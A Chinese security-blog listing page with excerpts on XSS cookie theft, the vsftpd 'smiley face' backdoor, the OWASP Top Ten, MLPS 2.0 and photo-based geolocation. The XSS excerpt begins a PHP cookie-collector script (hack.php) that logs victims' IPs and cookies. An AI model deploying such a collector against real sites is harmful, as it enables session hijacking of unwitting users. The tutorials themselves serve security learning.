- 博客(7)
- 收藏
- 关注
RSS订阅原创 xss漏洞的利用,脚本攻击
①先在kali-home-Flie System-var-www-html中找到html文件②需要在html文件中创建一个新的hack.php文件,创建时,需注意,如是新版的kali,则是没有权限创建的,此刻需要在右键中选择open as root,即转换为root权限,然后再选择创建一个新的文件到html中即可,如下图所示在该创建的文件html中,输入以下脚本内容<?php$victim=‘XXSgetthecookie:'.$_SERVER['REMOTE_ADDR...
2021-12-15 07:04:16
3159
原创 笑脸漏洞的查找
①先在kali上寻找靶机,如下②然后使用nmap扫描该靶机的ip地址,口令namp ip,查看该漏洞的端口,得到如下③然后使用ftp与该靶机连接,输入的命令语句是:ftp (靶机的ip),得到如下所示...
2021-12-14 09:56:45
2853
转载 OWASP Top Ten的相关
A01:访问控制失效(Broken Access Control)从第五位上升到了第一位。94%的应用程序都经过了某种形式的访问控制失效测试。映射到访问控制失效的34个CWE在应用程序中的出现频率比其他任何类别都要多。A02:2021年,加密失败(Cryptographic Failure)——此前名为“敏感数据暴露”(Sensitive Data Exposure),这一名称只是描述了广泛的症状而非根本原因——上移到了榜单第二位。此处需要重新关注与密码学相关的故障,这些故障通常会导致敏感数据暴露或系统
2021-12-14 09:21:41
156
2原创 等保2.0
什么是等保2.0?等保2.0全称网络安全等级保护2.0制度,是我国网络安全领域的基本国策、基本制度。等级保护标准在1.0时代标准的基础上,注重主动防御,从被动防御到事前、事中、事后全流程的安全可信、动态感知和全面审计,实现了对传统信息系统、基础信息网络、云计算、大数据、物联网、移动互联网和工业控制信息系统等级保护对象的全覆盖。”等保2.0的发布,是对除传统信息系统之外的新型网络系统安全防护能力提升的有效补充,是贯彻落实《中华人民共和国网络安全法》、实现国家网络安全战略目标的基础。等保2.0有
2021-10-17 22:55:10
5273
原创 图片线索查找麦当劳
图片信息如上问题:通过该图片,我们可以从有限的信息中排查,找到该图片的麦当劳详细地址线索查找过程:1.浏览一遍图片,从中,可以利用到的信息只有订单上的信息和数据,从而确定入手的方向2.从订单的信息中,排查所需要的,可能的信息,以下是该订单的放大图片从中可以筛选到的信息有 ...erbang Alaf Restauran ;Jalan SS21/39;第一次从这两个比较明显的信息入手查询3.使用国际网页版查询该看到的信息,我先查询的是Jalan SS21/39,查询结果如...
2021-10-10 23:17:39
234
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人